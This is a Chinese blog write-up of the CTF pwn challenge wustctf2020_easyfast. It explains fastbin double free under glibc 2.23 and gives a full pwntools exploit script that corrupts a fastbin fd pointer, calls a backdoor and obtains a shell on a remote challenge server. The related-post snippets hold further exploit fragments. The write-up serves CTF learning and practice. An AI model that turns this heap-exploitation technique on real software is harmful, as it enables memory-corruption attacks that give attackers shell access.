wustctf2020_easyfast(uaf)

最新推荐文章于 2024-02-06 21:27:21 发布
最新推荐文章于 2024-02-06 21:27:21 发布
阅读量508 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121160647
版权

wustctf2020_easyfast:

请添加图片描述
请添加图片描述

逆向分析:

主界面:
请添加图片描述

add函数:
请添加图片描述
free函数:
请添加图片描述
edit函数:
请添加图片描述
backdoor:
请添加图片描述
这题是libc2.23的doublefree,注意区别
引用这位师傅的回顾double free手法

在glibc2.27之前,主要是fastbin double free:
fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2),
free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size
glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double
free,tcache完全没有任何检查,只需要free(C1), free(C1)就可以构造一个环出来

可以看到题目上面有个0x50,帮我们绕过检查请添加图片描述

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './wustctf2020_easyfast'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',27879 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#-------------------------------
def add(size):
        sla('choice>\n','1')
        sla('size>\n',str(size))
def free(index):
        sla('choice>\n','2')
        sla('index>\n',str(index))
def edit(index,content):
        sla('choice>\n','3')
        sla('index>\n',str(index))
        se(content)
def backdoor():
        sla('choice>\n','4')
#--------------------------------
add(0x40)#0
add(0x40)#1
free(0)
free(1)
free(0)
#add(0x40)
edit(0,p64(0x602080))
add(0x40)
add(0x40)
edit(3,p64(0))
backdoor()
#debug()
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wustctf2020_easyfast
m0_73756460的博客
02-26 282
buu刷题wustctf2020_easyfast【wp】
[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)
半岛铁盒的博客
06-10 393
打开菜单,了解到相应的功能后,改一下名字 这个漏洞大致利用方式是这样的; 利用思路 通过double free修改chunk0的fd指针,让申请到的chunk能够覆盖到0x602090,修改1为0,最后直接调用backdoor来getshell from pwn import * #p=process('./wustctf2020_easyfast') p=remote("node3.buuoj.cn",25044) context.log_level="debug" def add(si
wustctf 2020 easyfast 做题笔记
fa1c4的blog
09-06 328
前言 一道fastbin attack (fastbin double free/ 其实BUU这题是UAF) 的题目 BUU有环境 分析过程 分析之后重命名各个函数 void sub_400ACD() { char s[8]; // [rsp+0h] [rbp-20h] BYREF __int64 v1; // [rsp+8h] [rbp-18h] unsigned __int64 v2; // [rsp+18h] [rbp-8h] v2 = __readfsqword(0x28u);
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
使用uaf42设计的有源滤波器,高通滤波器的设计参数记录
2021_UAF_SE_Nhom06
03-20
2021_UAF_SE_Nhom06
eID_fido-uaf-core
05-14
eID_fido-uaf-core
fido_uaf_certification_adapter:金雅拓FIDO UAF认证服务器的认证适配器
05-15
项目名称FIDO UAF一致性工具适配器先决条件Gematlo FIDO UAF服务器已启动并正在运行。正在安装将适配器部署到Tomcat 8.x应用程序服务器。 FIDO UAF服务器的URL由环境变量UAF_SERVER设置已知问题/局限性不支持TLS ...
[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)
最新发布
2301_79326813的博客
02-06 273
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 445
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];
buu easyfast —— fastbin attack 基础
weixin_48066554的博客
05-24 196
buu easyfast —— fastbin attack 基础 文章目录buu easyfast —— fastbin attack 基础引入初分析checksec伪代码思路exp 引入 面对恐惧,开始啃堆,柿子挑软的捏 初分析 题目默认环境Ubuntu16.04,该系统默认使用libc2.23,建议使用docker环境 checksec 伪代码 add unsigned __int64 add_400916() { int v0; // eax int v1; // ebx char
[WUSTCTF2020]朴实无华
SopRomeo的博客
05-20 1454
没啥提示,扫下目录 dirsearch 扫到robots.txt 进去看看 访问这个假的flag 扫不到其他东西了,抓个包看看 藏在这里头去了 看看代码 Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/fl4g.php:2) in /var/www/html/fl4g.php on line 3 <img src="/img.jpg"&g.
WUSTCTF2020 web题 --- 大人, 时代变了
qq_42436176的博客
07-19 4802
文章目录0x0 前言0x1 前端审计抓包逻辑分析解密算法0x2 验证码识别分析验证码处理特征提取0x3 代理池0x4 全部代码主体特征点0x5 题目源码前端App.tsxDrawer.tsx后端views.pyutils.pymodels.py 0x0 前言 出这个题的本意是看到CTF的web题老是PHP什么的, 感觉和现实情况有点脱节, 且对前端审计没有太大的要求, 于是出了这个"现代"一点的题. 这个题目模拟的是爬虫, 在多次请求后将会出现验证码, 再频繁访问将会封锁ip, 且网站是使用React写的,
fastbin attack快速入门
abelxu
11-13 1080
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小堆块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,堆块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小堆块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
WUST-CTF2020-WP
夏日 の blog
03-29 5273
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
BUUCTF:[WUSTCTF2020]爬
末初的CSDN博客
11-11 2507
https://buuoj.cn/challenges#[WUSTCTF2020]%E7%88%AC PDF文件,修改后缀为PDF,打开 删除掉这张图片,图片下面还有张图片 右键识别图片内容 77637466323032307b746831735f31735f405f7064665f616e645f7930755f63616e5f7573655f70686f7430736830707d >>> import binascii >>> binascii.unhe
堆机制利用之fastbin
weixin_48066554的博客
05-04 2293
堆机制利用之fastbin 前半部分:基于libc2.23(无tcache) 堆机制(fastbin等) 想要了解堆的机制利用方法必须要先了解堆的基本机制以及结构 目前主要使用的内存管理库是ptmalloc,而在ptmalloc中,用户请求的空间由名为chunk的数据结构表示 下面就是一个标准的chunk结构 该chunk中,**prev_size参数为前一chunk(如果未被使用)的大小,size参数为该chunk的大小,而P参数(pre_insue)为标志位,标志前一个chunk的使用情况。**而上述
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值